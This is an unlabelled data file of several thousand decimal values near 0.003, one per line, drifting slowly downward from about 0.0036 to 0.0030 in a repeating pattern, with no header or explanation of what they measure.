0.00359833
0.00358089
0.00358089
0.00359365
0.00359365
0.00357926
0.00358942
0.00359834
0.00358089
0.0035809
0.00359365
0.00359366
0.00357927
0.00358942
0.00359834
0.00358089
0.0035809
0.00359365
0.00359366
0.00357927
0.00361768
0.00360469
0.00359859
0.00363314
0.00361312
0.00360186
0.00358499
0.00358382
0.00362784
0.0035967
0.00358337
0.00362141
0.00358544
0.00363389
0.00358318
0.0036131
0.00360186
0.00358383
0.00358503
0.0035967
0.00362774
0.00358338
0.0036214
0.00358543
0.00363371
0.0035832
0.00360918
0.00363726
0.00363727
0.00359158
0.00363711
0.00360585
0.00359011
0.00359008
0.00363144
0.00363144
0.00359172
0.00363714
0.00361775
0.0036047
0.00359861
0.00363326
0.00361316
0.00360186
0.00358383
0.00358496
0.00359671
0.00362769
0.00358338
0.00361315
0.00360187
0.00358383
0.00358499
0.00359671
0.00362785
0.00358338
0.00362146
0.00358551
0.00363361
0.0035832
0.00362146
0.00358544
0.0036339
0.0035832
0.00360585
0.00359013
0.00359004
0.00363146
0.00363157
0.00359167
0.00363716
0.00359171
0.00363731
0.00352771
0.00354701
0.00352783
0.00354702
0.00356182
0.00356186
0.00354946
0.00354972
0.00354973
0.0035237
0.00354002
0.00352369
0.00354009
0.00354182
0.0035252
0.0035252
0.00354271
0.00354274
0.00354972
0.0035497
0.00356812
0.00354806
0.00354841
0.00356516
0.0035683
0.00355258
0.00357049
0.00354937
0.00355321
0.00354841
0.00356514
0.0035683
0.00355258
0.0035705
0.00354938
0.00355321
0.00354323
0.00352438
0.00354117
0.0035254
0.00354323
0.00352437
0.00354117
0.0035254
0.00354192
0.00353955
0.00352494
0.00352717
0.00354252
0.00353974
0.0035242
0.00354192
0.00353955
0.00352494
0.00352717
0.00354252
0.00353974
0.0035242
0.0035618
0.00356183
0.00354947
0.00354973
0.00354973
0.0035279
0.00354706
0.00352369
0.00354002
0.00354181
0.0035252
0.00352521
0.00354272
0.00354272
0.00352371
0.00354007
0.00354841
0.00356517
0.00356831
0.00355259
0.0035705
0.00354939
0.00355322
0.00354973
0.00354971
0.00356811
0.00354809
0.00354842
0.00356831
0.00356515
0.00355258
0.0035705
0.00355322
0.00354939
0.00354324
0.00352437
0.00354121
0.0035254
0.00354193
0.00353955
0.00352494
0.00352717
0.00354253
0.00353974
0.0035242
0.00354323
0.00352437
0.0035412
0.0035254
0.00354193
0.00353955
0.00352717
0.00352494
0.00353974
0.00354253
0.0035242
0.00354972
0.00354981
0.00356811
0.00354808
0.00354842
0.00356831
0.00356521
0.00355258
0.00357052
0.00355321
0.00354939
0.00354973
0.00354991
0.00356814
0.00354808
0.00354192
0.00353954
0.00352494
0.00352717
0.00354251
0.00353974
0.0035242
0.00354322
0.00352438
0.00354117
0.0035254
0.00354192
0.00353955
0.00352717
0.00352494
0.00353974
0.00354252
0.0035242
0.00354323
0.00352438
0.00354117
0.0035254
0.00356183
0.00356183
0.00354944
0.00354974
0.00354971
0.00352787
0.00354701
0.00352369
0.00354005
0.00354182
0.0035252
0.0035252
0.00354273
0.00354271
0.00352368
0.00354003
0.0035484
0.0035683
0.00356516
0.00355258
0.0035705
0.00355321
0.00354937
0.00354972
0.00354971
0.0035681
0.00354805
0.00354972
0.00354983
0.00356811
0.00354806
0.00354192
0.00353955
0.00352717
0.00352493
0.00353974
0.00354252
0.00352419
0.00354191
0.00353955
0.00352717
0.00352493
0.00353974
0.00354251
0.00352419
0.00354322
0.00352437
0.00354119
0.00352539
0.00354322
0.00352436
0.00354117
0.00352539
0.00352797
0.00354703
0.00352791
0.00354702
0.00354182
0.0035252
0.00352519
0.00354273
0.00354272
0.0035237
0.00354003
0.00352367
0.00354005
0.00351728
0.00349866
0.00351726
0.00349865
0.00351867
0.00351866
0.00349954
0.00349971
0.00349972
0.00347283
0.00349199
0.00347283
0.00349199
0.00349163
0.00347362
0.00347362
0.00349298
0.00349298
0.00350002
0.0035179
0.00351891
0.00349912
0.00349912
0.00351838
0.00351473
0.00350217
0.00351767
0.00349959
0.00350211
0.00349912
0.00351838
0.00351473
0.00350217
0.00351767
0.00349959
0.00350211
0.00349332
0.00347315
0.00349241
0.003474
0.00349332
0.00347315
0.00349241
0.003474
0.00349236
0.00348936
0.0034736
0.00347638
0.00349282
0.0034893
0.00347331
0.00349236
0.00348935
0.0034736
0.00347638
0.00349282
0.0034893
0.00347331
0.00351866
0.00351867
0.00349954
0.00349971
0.00349971
0.0035173
0.00349866
0.00347283
0.00349199
0.00349163
0.00347362
0.00347362
0.00349298
0.00349298
0.00347283
0.00349199
0.00349912
0.00351838
0.00351473
0.00350217
0.00351767
0.00349959
0.00350211
0.00350002
0.0035179
0.00351891
0.00349912
0.00349912
0.00351473
0.00351838
0.00350217
0.00351767
0.00350211
0.00349959
0.00349332
0.00347315
0.00349241
0.003474
0.00349236
0.00348935
0.0034736
0.00347638
0.00349282
0.0034893
0.00347331
0.00349332
0.00347315
0.00349241
0.003474
0.00349236
0.00348935
0.00347638
0.0034736
0.0034893
0.00349282
0.00347331
0.00350002
0.00351791
0.00351891
0.00349912
0.00349912
0.00351473
0.00351838
0.00350217
0.00351768
0.00350211
0.00349959
0.00350002
0.00351789
0.00351891
0.00349912
0.00349236
0.00348935
0.0034736
0.00347638
0.00349282
0.0034893
0.00347331
0.00349332
0.00347315
0.00349241
0.003474
0.00349236
0.00348936
0.00347638
0.0034736
0.0034893
0.00349282
0.00347331
0.00349332
0.00347315
0.00349241
0.003474
0.00351866
0.00351866
0.00349954
0.00349971
0.00349971
0.00351727
0.00349865
0.00347283
0.00349199
0.00349162
0.00347362
0.00347362
0.00349298
0.00349298
0.00347283
0.00349199
0.00349912
0.00351473
0.00351838
0.00350217
0.00351767
0.00350211
0.00349959
0.00350002
0.0035179
0.00351892
0.00349912
0.00350002
0.0035179
0.00351892
0.00349912
0.00349236
0.00348935
0.00347638
0.0034736
0.0034893
0.00349282
0.00347331
0.00349236
0.00348935
0.00347638
0.0034736
0.0034893
0.00349282
0.00347331
0.00349332
0.00347315
0.00349241
0.00347399
0.00349332
0.00347315
0.00349241
0.00347399
0.00351726
0.00349865
0.00351727
0.00349865
0.00349163
0.00347362
0.00347362
0.00349298
0.00349298
0.00347283
0.00349199
0.00347283
0.00349199
0.00346606
0.00344675
0.00346606
0.00344675
0.0034668
0.0034668
0.00344772
0.00344736
0.00344736
0.0034207
0.00343997
0.00342071
0.00343997
0.00343968
0.0034212
0.0034212
0.00344054
0.00344054
0.00344776
0.00346635
0.0034672
0.00344698
0.00344724
0.00346673
0.0034634
0.00345041
0.00346644
0.00344741
0.00345039
0.00344724
0.00346673
0.0034634
0.00345041
0.00346644
0.00344741
0.00345039
0.00344095
0.00342089
0.00344018
0.00342159
0.00344095
0.00342089
0.00344018
0.00342159
0.00344035
0.00343739
0.00342129
0.00342439
0.00344052
0.00343738
0.0034212
0.00344035
0.00343739
0.00342129
0.00342439
0.00344052
0.00343738
0.0034212
0.0034668
0.0034668
0.00344772
0.00344735
0.00344736
0.00346606
0.00344675
0.00342071
0.00343997
0.00343968
0.0034212
0.0034212
0.00344054
0.00344054
0.00342071
0.00343997
0.00344724
0.00346673
0.0034634
0.00345041
0.00346644
0.00344741
0.00345039
0.00344776
0.00346635
0.0034672
0.00344698
0.00344724
0.0034634
0.00346673
0.00345041
0.00346644
0.00345039
0.00344741
0.00344095
0.00342089
0.00344018
0.00342159
0.00344035
0.00343739
0.00342129
0.00342439
0.00344052
0.00343738
0.0034212
0.00344095
0.00342089
0.00344018
0.00342158
0.00344035
0.00343739
0.00342439
0.00342129
0.00343738
0.00344052
0.0034212
0.00344776
0.00346636
0.0034672
0.00344698
0.00344724
0.0034634
0.00346673
0.00345041
0.00346644
0.00345039
0.00344741
0.00344776
0.00346636
0.0034672
0.00344699
0.00344035
0.00343739
0.00342129
0.00342439
0.00344052
0.00343738
0.0034212
0.00344095
0.00342089
0.00344018
0.00342159
0.00344035
0.00343739
0.00342439
0.00342129
0.00343738
0.00344052
0.0034212
0.00344095
0.00342089
0.00344018
0.00342159
0.0034668
0.0034668
0.00344772
0.00344735
0.00344736
0.00346606
0.00344675
0.0034207
0.00343997
0.00343968
0.0034212
0.0034212
0.00344054
0.00344054
0.0034207
0.00343997
0.00344724
0.0034634
0.00346673
0.0034504
0.00346644
0.00345039
0.00344741
0.00344776
0.00346635
0.0034672
0.00344698
0.00344776
0.00346636
0.0034672
0.00344698
0.00344035
0.00343739
0.00342439
0.00342129
0.00343738
0.00344052
0.0034212
0.00344035
0.00343739
0.00342439
0.00342129
0.00343738
0.00344052
0.0034212
0.00344095
0.00342089
0.00344018
0.00342158
0.00344095
0.00342089
0.00344018
0.00342159
0.00346606
0.00344675
0.00346606
0.00344675
0.00343968
0.0034212
0.0034212
0.00344055
0.00344054
0.00342071
0.00343997
0.00342071
0.00343997
0.00341397
0.00339488
0.00341397
0.00339488
0.00341443
0.00341444
0.0033959
0.00339529
0.00339529
0.00336936
0.00338821
0.00336936
0.00338821
0.00338799
0.00336973
0.00336973
0.00338861
0.00338861
0.00339564
0.00341413
0.00341482
0.00339503
0.00339537
0.00341444
0.00341145
0.00339855
0.00341434
0.00339541
0.00339856
0.00339537
0.00341444
0.00341145
0.00339856
0.00341434
0.00339541
0.00339856
0.00338894
0.0033695
0.00338835
0.00337002
0.00338895
0.0033695
0.00338835
0.00337002
0.00338857
0.00338574
0.00336985
0.00337301
0.00338863
0.00338575
0.00336983
0.00338857
0.00338574
0.00336985
0.00337301
0.00338863
0.00338575
0.00336983
0.00341443
0.00341443
0.0033959
0.00339529
0.00339529
0.00341397
0.00339488
0.00336936
0.00338822
0.00338799
0.00336973
0.00336973
0.00338861
0.00338861
0.00336936
0.00338822
0.00339537
0.00341444
0.00341145
0.00339855
0.00341434
0.00339541
0.00339856
0.00339564
0.00341413
0.00341482
0.00339503
0.00339537
0.00341145
0.00341444
0.00339856
0.00341434
0.00339856
0.00339541
0.00338894
0.0033695
0.00338835
0.00337002
0.00338857
0.00338574
0.00336985
0.00337301
0.00338863
0.00338575
0.00336983
0.00338894
0.0033695
0.00338835
0.00337002
0.00338857
0.00338574
0.00337301
0.00336985
0.00338575
0.00338862
0.00336983
0.00339564
0.00341413
0.00341482
0.00339503
0.00339537
0.00341145
0.00341444
0.00339855
0.00341434
0.00339856
0.00339541
0.00339564
0.00341414
0.00341482
0.00339503
0.00338857
0.00338574
0.00336985
0.00337301
0.00338863
0.00338575
0.00336983
0.00338895
0.0033695
0.00338835
0.00337002
0.00338857
0.00338574
0.00337301
0.00336985
0.00338575
0.00338863
0.00336983
0.00338895
0.0033695
0.00338835
0.00337002
0.00341443
0.00341444
0.0033959
0.00339529
0.00339529
0.00341397
0.00339488
0.00336936
0.00338821
0.00338799
0.00336973
0.00336973
0.00338861
0.00338861
0.00336936
0.00338822
0.00339537
0.00341145
0.00341444
0.00339855
0.00341434
0.00339856
0.00339541
0.00339564
0.00341413
0.00341482
0.00339503
0.00339564
0.00341413
0.00341482
0.00339503
0.00338857
0.00338574
0.00337301
0.00336985
0.00338575
0.00338863
0.00336983
0.00338857
0.00338574
0.00337301
0.00336985
0.00338575
0.00338863
0.00336983
0.00338894
0.0033695
0.00338835
0.00337002
0.00338894
0.0033695
0.00338835
0.00337002
0.00341397
0.00339488
0.00341397
0.00339488
0.003388
0.00336973
0.00336973
0.00338861
0.00338861
0.00336936
0.00338822
0.00336936
0.00338822
0.00336279
0.0033442
0.00336279
0.0033442
0.00336313
0.00336313
0.00334522
0.00334453
0.00334453
0.00331942
0.00333773
0.00331941
0.00333772
0.00333753
0.00331972
0.00331972
0.00333803
0.00333803
0.00334477
0.00336291
0.00336341
0.00334433
0.00334465
0.00336315
0.00336036
0.00334778
0.00336311
0.00334466
0.00334779
0.00334465
0.00336315
0.00336036
0.00334779
0.00336311
0.00334465
0.00334779
0.00333825
0.00331953
0.00333783
0.0033199
0.00333825
0.00331954
0.00333783
0.0033199
0.00333802
0.00333531
0.00331984
0.00332293
0.00333804
0.00333532
0.00331984
0.00333802
0.00333531
0.00331984
0.00332293
0.00333804
0.00333532
0.00331984
0.00336314
0.00336313
0.00334522
0.00334453
0.00334453
0.00336279
0.0033442
0.00331942
0.00333772
0.00333753
0.00331973
0.00331972
0.00333803
0.00333803
0.00331942
0.00333773
0.00334465
0.00336315
0.00336036
0.00334778
0.00336311
0.00334466
0.00334779
0.00334477
0.00336291
0.00336341
0.00334433
0.00334465
0.00336036
0.00336315
0.00334778
0.00336311
0.00334779
0.00334466
0.00333825
0.00331953
0.00333783
0.0033199
0.00333802
0.00333531
0.00331984
0.00332293
0.00333804
0.00333532
0.00331984
0.00333825
0.00331953
0.00333783
0.0033199
0.00333802
0.00333531
0.00332293
0.00331984
0.00333532
0.00333804
0.00331984
0.00334477
0.00336291
0.00336341
0.00334433
0.00334465
0.00336036
0.00336315
0.00334778
0.00336311
0.00334779
0.00334466
0.00334477
0.00336291
0.00336341
0.00334433
0.00333802
0.00333531
0.00331984
0.00332293
0.00333804
0.00333532
0.00331984
0.00333825
0.00331953
0.00333783
0.0033199
0.00333802
0.00333531
0.00332293
0.00331984
0.00333532
0.00333804
0.00331984
0.00333825
0.00331953
0.00333783
0.0033199
0.00336313
0.00336313
0.00334522
0.00334453
0.00334453
0.00336279
0.0033442
0.00331941
0.00333773
0.00333753
0.00331972
0.00331972
0.00333803
0.00333803
0.00331941
0.00333772
0.00334465
0.00336036
0.00336315
0.00334778
0.00336311
0.00334779
0.00334466
0.00334477
0.00336291
0.00336341
0.00334433
0.00334477
0.00336291
0.00336341
0.00334433
0.00333802
0.00333531
0.00332293
0.00331984
0.00333532
0.00333804
0.00331984
0.00333802
0.00333531
0.00332293
0.00331984
0.00333532
0.00333804
0.00331984
0.00333825
0.00331953
0.00333783
0.0033199
0.00333825
0.00331953
0.00333783
0.0033199
0.00336279
0.0033442
0.00336279
0.0033442
0.00333753
0.00331972
0.00331972
0.00333803
0.00333803
0.00331942
0.00333772
0.00331941
0.00333772
0.00331303
0.003295
0.00331303
0.003295
0.00331332
0.00331332
0.00329598
0.00329529
0.00329529
0.00327093
0.00328871
0.00327093
0.00328871
0.00328852
0.00327121
0.00327121
0.00328897
0.00328897
0.00329541
0.00331313
0.00331348
0.0032951
0.0032954
0.00331331
0.00331064
0.00329845
0.0033133
0.0032954
0.00329844
0.0032954
0.00331331
0.00331064
0.00329845
0.0033133
0.0032954
0.00329844
0.00328909
0.00327104
0.00328879
0.0032713
0.00328909
0.00327104
0.00328879
0.0032713
0.00328894
0.00328634
0.00327132
0.00327431
0.00328896
0.00328633
0.00327132
0.00328894
0.00328634
0.00327132
0.00327431
0.00328895
0.00328633
0.00327132
0.00331332
0.00331332
0.00329598
0.00329528
0.00329529
0.00331303
0.003295
0.00327093
0.0032887
0.00328851
0.00327121
0.00327121
0.00328897
0.00328897
0.00327093
0.00328871
0.0032954
0.00331331
0.00331064
0.00329845
0.0033133
0.0032954
0.00329844
0.00329542
0.00331313
0.00331348
0.00329511
0.0032954
0.00331064
0.00331331
0.00329845
0.0033133
0.00329844
0.0032954
0.00328909
0.00327104
0.00328879
0.0032713
0.00328894
0.00328634
0.00327132
0.00327431
0.00328896
0.00328633
0.00327132
0.00328909
0.00327104
0.00328879
0.0032713
0.00328894
0.00328634
0.00327431
0.00327132
0.00328633
0.00328895
0.00327132
0.00329542
0.00331313
0.00331348
0.00329511
0.0032954
0.00331064
0.00331331
0.00329845
0.0033133
0.00329844
0.0032954
0.00329542
0.00331313
0.00331348
0.00329511
0.00328895
0.00328634
0.00327132
0.00327431
0.00328896
0.00328633
0.00327132
0.00328909
0.00327104
0.00328879
0.0032713
0.00328895
0.00328634
0.00327431
0.00327132
0.00328633
0.00328896
0.00327132
0.00328909
0.00327104
0.00328879
0.0032713
0.00331332
0.00331332
0.00329598
0.00329529
0.00329529
0.00331303
0.00329499
0.00327093
0.00328871
0.00328852
0.00327121
0.00327121
0.00328897
0.00328897
0.00327093
0.00328871
0.0032954
0.00331064
0.00331331
0.00329845
0.0033133
0.00329844
0.0032954
0.00329542
0.00331313
0.00331348
0.00329511
0.00329542
0.00331313
0.00331348
0.00329511
0.00328894
0.00328634
0.00327431
0.00327132
0.00328633
0.00328896
0.00327132
0.00328894
0.00328634
0.00327431
0.00327132
0.00328633
0.00328896
0.00327132
0.00328909
0.00327104
0.00328879
0.0032713
0.00328909
0.00327104
0.00328879
0.0032713
0.00331303
0.003295
0.00331303
0.003295
0.00328852
0.00327121
0.00327121
0.00328897
0.00328897
0.00327093
0.00328871
0.00327093
0.00328871
0.00326473
0.0032472
0.00326473
0.0032472
0.00326498
0.00326498
0.00324815
0.00324747
0.00324746
0.00322377
0.00324108
0.00322377
0.00324108
0.00324088
0.00322403
0.00322403
0.00324132
0.00324132
0.00324752
0.00326481
0.00326506
0.0032473
0.00324758
0.00326495
0.00326237
0.00325052
0.00326494
0.00324757
0.00325051
0.00324758
0.00326495
0.00326237
0.00325052
0.00326494
0.00324757
0.00325051
0.00324136
0.00322387
0.00324116
0.00322406
0.00324136
0.00322387
0.00324116
0.00322406
0.00324127
0.00323874
0.00322414
0.00322702
0.00324128
0.00323873
0.00322414
0.00324127
0.00323874
0.00322414
0.00322702
0.00324128
0.00323873
0.00322414
0.00326498
0.00326498
0.00324815
0.00324746
0.00324747
0.00326473
0.0032472
0.00322377
0.00324108
0.00324088
0.00322403
0.00322403
0.00324132
0.00324132
0.00322377
0.00324108
0.00324758
0.00326495
0.00326237
0.00325052
0.00326494
0.00324757
0.00325051
0.00324752
0.00326481
0.00326506
0.0032473
0.00324758
0.00326237
0.00326495
0.00325052
0.00326494
0.00325051
0.00324757
0.00324136
0.00322388
0.00324116
0.00322406
0.00324127
0.00323874
0.00322414
0.00322702
0.00324128
0.00323873
0.00322414
0.00324136
0.00322388
0.00324116
0.00322406
0.00324127
0.00323874
0.00322702
0.00322414
0.00323873
0.00324128
0.00322414
0.00324752
0.00326481
0.00326506
0.0032473
0.00324758
0.00326237
0.00326496
0.00325052
0.00326494
0.00325051
0.00324757
0.00324752
0.00326481
0.00326506
0.0032473
0.00324127
0.00323874
0.00322414
0.00322702
0.00324128
0.00323873
0.00322414
0.00324136
0.00322388
0.00324116
0.00322407
0.00324127
0.00323874
0.00322702
0.00322414
0.00323873
0.00324128
0.00322414
0.00324136
0.00322388
0.00324116
0.00322407
0.00326498
0.00326498
0.00324815
0.00324746
0.00324746
0.00326473
0.0032472
0.00322377
0.00324108
0.00324088
0.00322403
0.00322403
0.00324131
0.00324132
0.00322377
0.00324108
0.00324758
0.00326237
0.00326496
0.00325052
0.00326494
0.00325051
0.00324757
0.00324752
0.00326481
0.00326506
0.0032473
0.00324752
0.00326481
0.00326506
0.0032473
0.00324127
0.00323874
0.00322702
0.00322414
0.00323873
0.00324128
0.00322414
0.00324127
0.00323874
0.00322703
0.00322414
0.00323873
0.00324128
0.00322414
0.00324136
0.00322388
0.00324116
0.00322406
0.00324136
0.00322388
0.00324116
0.00322406
0.00326473
0.0032472
0.00326473
0.0032472
0.00324088
0.00322403
0.00322403
0.00324132
0.00324132
0.00322377
0.00324108
0.00322377
0.00324108
0.00321773
0.00320063
0.00321773
0.00320063
0.00321795
0.00321795
0.00320155
0.00320088
0.00320088
0.00317774
0.00319465
0.00317774
0.00319465
0.00319445
0.00317798
0.00317798
0.00319487
0.00319487
0.0032009
0.0032178
0.00321798
0.00320073
0.00320099
0.00321792
0.00321539
0.00320384
0.00321791
0.00320099
0.00320382
0.00320099
0.00321792
0.00321539
0.00320384
0.00321791
0.00320099
0.00320382
0.00319488
0.00317784
0.00319473
0.00317799
0.00319488
0.00317784
0.00319473
0.00317799
0.00319482
0.00319234
0.00317809
0.00318089
0.00319483
0.00319232
0.0031781
0.00319482
0.00319234
0.00317809
0.00318089
0.00319483
0.00319232
0.0031781
0.00321795
0.00321795
0.00320155
0.00320088
0.00320088
0.00321773
0.00320063
0.00317774
0.00319465
0.00319445
0.00317798
0.00317798
0.00319487
0.00319487
0.00317774
0.00319465
0.00320099
0.00321792
0.00321539
0.00320384
0.00321791
0.00320099
0.00320382
0.0032009
0.0032178
0.00321798
0.00320073
0.00320099
0.00321539
0.00321792
0.00320384
0.00321791
0.00320382
0.00320099
0.00319488
0.00317784
0.00319473
0.00317799
0.00319482
0.00319234
0.00317809
0.00318089
0.00319483
0.00319232
0.0031781
0.00319488
0.00317784
0.00319472
0.00317799
0.00319482
0.00319234
0.00318089
0.00317809
0.00319232
0.00319483
0.0031781
0.0032009
0.0032178
0.00321798
0.00320073
0.00320099
0.00321539
0.00321792
0.00320384
0.00321791
0.00320383
0.00320099
0.0032009
0.0032178
0.00321798
0.00320073
0.00319482
0.00319234
0.0031781
0.00318089
0.00319483
0.00319232
0.0031781
0.00319488
0.00317784
0.00319473
0.00317799
0.00319482
0.00319234
0.00318089
0.00317809
0.00319232
0.00319483
0.0031781
0.00319488
0.00317784
0.00319473
0.00317799
0.00321795
0.00321795
0.00320155
0.00320088
0.00320088
0.00321773
0.00320063
0.00317774
0.00319465
0.00319445
0.00317798
0.00317798
0.00319487
0.00319487
0.00317774
0.00319465
0.00320099
0.00321539
0.00321792
0.00320384
0.00321791
0.00320383
0.00320099
0.0032009
0.0032178
0.00321798
0.00320073
0.0032009
0.0032178
0.00321798
0.00320073
0.00319482
0.00319234
0.00318089
0.00317809
0.00319232
0.00319483
0.0031781
0.00319482
0.00319234
0.00318089
0.00317809
0.00319232
0.00319483
0.0031781
0.00319488
0.00317784
0.00319473
0.00317799
0.00319488
0.00317784
0.00319473
0.00317799
0.00321773
0.00320063
0.00321773
0.00320063
0.00319445
0.00317798
0.00317798
0.00319487
0.00319487
0.00317774
0.00319465
0.00317774
0.00319465
0.00317182
0.00315508
0.00317182
0.00315508
0.00317203
0.00317203
0.00315598
0.00315531
0.00315531
0.00313263
0.00314922
0.00313263
0.00314922
0.00314901
0.00313285
0.00313285
0.00314942
0.00314942
0.00315531
0.00317189
0.00317203
0.00315518
0.00315544
0.00317199
0.0031695
0.0031582
0.00317198
0.00315543
0.00315818
0.00315544
0.00317199
0.0031695
0.0031582
0.00317198
0.00315543
0.00315818
0.00314941
0.00313272
0.00314929
0.00313285
0.00314941
0.00313272
0.00314929
0.00313285
0.00314937
0.00314693
0.00313298
0.00313569
0.00314937
0.00314691
0.00313299
0.00314937
0.00314693
0.00313298
0.00313569
0.00314937
0.00314691
0.00313299
0.00317203
0.00317203
0.00315598
0.00315531
0.00315531
0.00317182
0.00315508
0.00313263
0.00314922
0.00314901
0.00313285
0.00313285
0.00314942
0.00314942
0.00313263
0.00314922
0.00315544
0.00317199
0.00316951
0.0031582
0.00317198
0.00315543
0.00315818
0.00315531
0.00317189
0.00317203
0.00315518
0.00315544
0.0031695
0.00317199
0.0031582
0.00317198
0.00315818
0.00315543
0.00314941
0.00313272
0.00314929
0.00313285
0.00314937
0.00314693
0.00313298
0.00313569
0.00314937
0.00314691
0.00313299
0.00314941
0.00313272
0.00314929
0.00313285
0.00314937
0.00314693
0.00313569
0.00313298
0.00314691
0.00314937
0.00313299
0.00315531
0.00317189
0.00317203
0.00315518
0.00315544
0.00316951
0.00317199
0.0031582
0.00317198
0.00315818
0.00315543
0.00315531
0.00317189
0.00317203
0.00315518
0.00314937
0.00314693
0.00313298
0.00313569
0.00314937
0.00314691
0.00313299
0.00314941
0.00313272
0.00314929
0.00313285
0.00314937
0.00314693
0.00313569
0.00313297
0.00314691
0.00314937
0.00313299
0.00314941
0.00313272
0.00314928
0.00313285
0.00317203
0.00317203
0.00315598
0.00315531
0.00315531
0.00317182
0.00315508
0.00313263
0.00314922
0.00314901
0.00313285
0.00313285
0.00314942
0.00314942
0.00313262
0.00314922
0.00315544
0.00316951
0.00317199
0.0031582
0.00317198
0.00315818
0.00315543
0.00315531
0.00317189
0.00317203
0.00315518
0.00315531
0.00317189
0.00317203
0.00315518
0.00314937
0.00314693
0.00313569
0.00313297
0.00314691
0.00314937
0.00313299
0.00314936
0.00314693
0.00313569
0.00313297
0.00314691
0.00314937
0.00313299
0.00314941
0.00313272
0.00314929
0.00313285
0.00314941
0.00313272
0.00314928
0.00313285
0.00317182
0.00315508
0.00317182
0.00315508
0.00314901
0.00313285
0.00313285
0.00314941
0.00314941
0.00313262
0.00314921
0.00313262
0.00314921
0.00312681
0.00311036
0.00312681
0.00311036
0.00312701
0.003127
0.00311124
0.00311058
0.00311058
0.00308824
0.00310459
0.00308825
0.00310459
0.00310438
0.00308846
0.00308846
0.00310477
0.00310477
0.00311057
0.00312688
0.00312699
0.00311045
0.00311072
0.00312696
0.00312451
0.00311341
0.00312695
0.00311071
0.00311338
0.00311072
0.00312696
0.00312451
0.00311341
0.00312695
0.0031107
0.00311338
0.00310475
0.00308834
0.00310466
0.00308846
0.00310475
0.00308834
0.00310465
0.00308846
0.00310472
0.00310232
0.0030886
0.00309125
0.00310473
0.0031023
0.00308862
0.00310472
0.00310232
0.0030886
0.00309125
0.00310473
0.0031023
0.00308862
0.003127
0.003127
0.00311123
0.00311058
0.00311057
0.00312681
0.00311035
0.00308825
0.00310458
0.00310438
0.00308846
0.00308846
0.00310477
0.00310477
0.00308825
0.00310458
0.00311072
0.00312696
0.00312451
0.00311341
0.00312695
0.0031107
0.00311338
0.00311057
0.00312688
0.00312699
0.00311045
0.00311072
0.00312451
0.00312696
0.00311341
0.00312695
0.00311338
0.0031107
0.00310475
0.00308834
0.00310465
0.00308846
0.00310472
0.00310232
0.0030886
0.00309125
0.00310473
0.0031023
0.00308862
0.00310475
0.00308834
0.00310465
0.00308846
0.00310472
0.00310232
0.00309125
0.0030886
0.0031023
0.00310473
0.00308862
0.00311057
0.00312688
0.00312699
0.00311045
0.00311072
0.00312451
0.00312696
0.00311341
0.00312695
0.00311338
0.0031107
0.00311057
0.00312688
0.00312699
0.00311045
0.00310472
0.00310232
0.0030886
0.00309125
0.00310473
0.0031023
0.00308862
0.00310475
0.00308834
0.00310465
0.00308846
0.00310472
0.00310232
0.00309125
0.0030886
0.0031023
0.00310473
0.00308862
0.00310475
0.00308834
0.00310465
0.00308846
0.003127
0.003127
0.00311123
0.00311057
0.00311057
0.00312681
0.00311035
0.00308825
0.00310458
0.00310438
0.00308846
0.00308846
0.00310477
0.00310477
0.00308825
0.00310458
0.00311072
0.00312451
0.00312696
0.00311341
0.00312695
0.00311338
0.0031107
0.00311057
0.00312688
0.00312699
0.00311045
0.00311057
0.00312688
0.00312699
0.00311045
0.00310472
0.00310232
0.00309125
0.0030886
0.0031023
0.00310473
0.00308862
0.00310472
0.00310232
0.00309125
0.0030886
0.0031023
0.00310473
0.00308862
0.00310475
0.00308834
0.00310465
0.00308846
0.00310475
0.00308834
0.00310465
0.00308846
0.00312681
0.00311035
0.00312681
0.00311035
0.00310438
0.00308846
0.00308846
0.00310477
0.00310477
0.00308825
0.00310458
0.00308825
0.00310458
0.00308251
0.0030663
0.00308252
0.00306629
0.00308269
0.0030827
0.00306716
0.0030665
0.0030665
0.00304448
0.0030606
0.00304448
0.0030606
0.00306039
0.00304468
0.00304468
0.00306077
0.00306077
0.0030665
0.00308259
0.00308268
0.00306639
0.00306667
0.00308265
0.00308024
0.00306929
0.00308265
0.00306664
0.00306927
0.00306667
0.00308266
0.00308024
0.00306929
0.00308265
0.00306664
0.00306927
0.00306076
0.00304457
0.00306067
0.00304468
0.00306076
0.00304457
0.00306067
0.00304468
0.00306074
0.00305836
0.00304482
0.00304743
0.00306073
0.00305834
0.00304486
0.00306074
0.00305836
0.00304482
0.00304743
0.00306073
0.00305834
0.00304486
0.0030827
0.0030827
0.00306716
0.0030665
0.0030665
0.00308252
0.0030663
0.00304448
0.0030606
0.00306039
0.00304468
0.00304468
0.00306077
0.00306077
0.00304448
0.0030606
0.00306667
0.00308266
0.00308024
0.00306929
0.00308265
0.00306664
0.00306927
0.0030665
0.00308259
0.00308268
0.00306639
0.00306667
0.00308024
0.00308266
0.00306929
0.00308265
0.00306927
0.00306664
0.00306076
0.00304457
0.00306067
0.00304468
0.00306074
0.00305836
0.00304482
0.00304743
0.00306073
0.00305834
0.00304486
0.00306076
0.00304457
0.00306067
0.00304468
0.00306074
0.00305836
0.00304743
0.00304482
0.00305834
0.00306073
0.00304486
0.0030665
0.00308259
0.00308268
0.00306639
0.00306667
0.00308024
0.00308266
0.00306929
0.00308265
0.00306927
0.00306664
0.0030665
0.00308259
0.00308268
0.00306639
0.00306074
0.00305836
0.00304483
0.00304743
0.00306073
0.00305834
0.00304487
0.00306076
0.00304457
0.00306067
0.00304468
0.00306074
0.00305836
0.00304743
0.00304482
0.00305834
0.00306073
0.00304487
0.00306076
0.00304457
0.00306067
0.00304468
0.0030827
0.0030827
0.00306716
0.0030665
0.0030665
0.00308252
0.0030663
0.00304448
0.0030606
0.00306039
0.00304468
0.00304468
0.00306077
0.00306077
0.00304448
0.0030606
0.00306667
0.00308024
0.00308266
0.00306929
0.00308265
0.00306927
0.00306664
0.0030665
0.00308259
0.00308268
0.00306639
0.0030665
0.00308259
0.00308268
0.00306639
0.00306074
0.00305836
0.00304744
0.00304482
0.00305834
0.00306073
0.00304487
0.00306074
0.00305836
0.00304743
0.00304482
0.00305834
0.00306073
0.00304487
0.00306076
0.00304457
0.00306067
0.00304468
0.00306076
0.00304457
0.00306067
0.00304468
0.00308252
0.0030663
0.00308252
0.0030663
0.00306039
0.00304468
0.00304468
0.00306077
0.00306077
0.00304448
0.0030606
0.00304448
0.0030606
0.00303882
0.00302279
0.00303882
0.0030228
0.00303898
0.00303898
0.00302364
0.00302299
0.00302299
0.00300123
0.00301717
0.00300123
0.00301717
0.00301695
0.00300142
0.00300142
0.00301732
0.00301732
0.003023
0.00303888
0.00303898
0.00302288
0.00302319
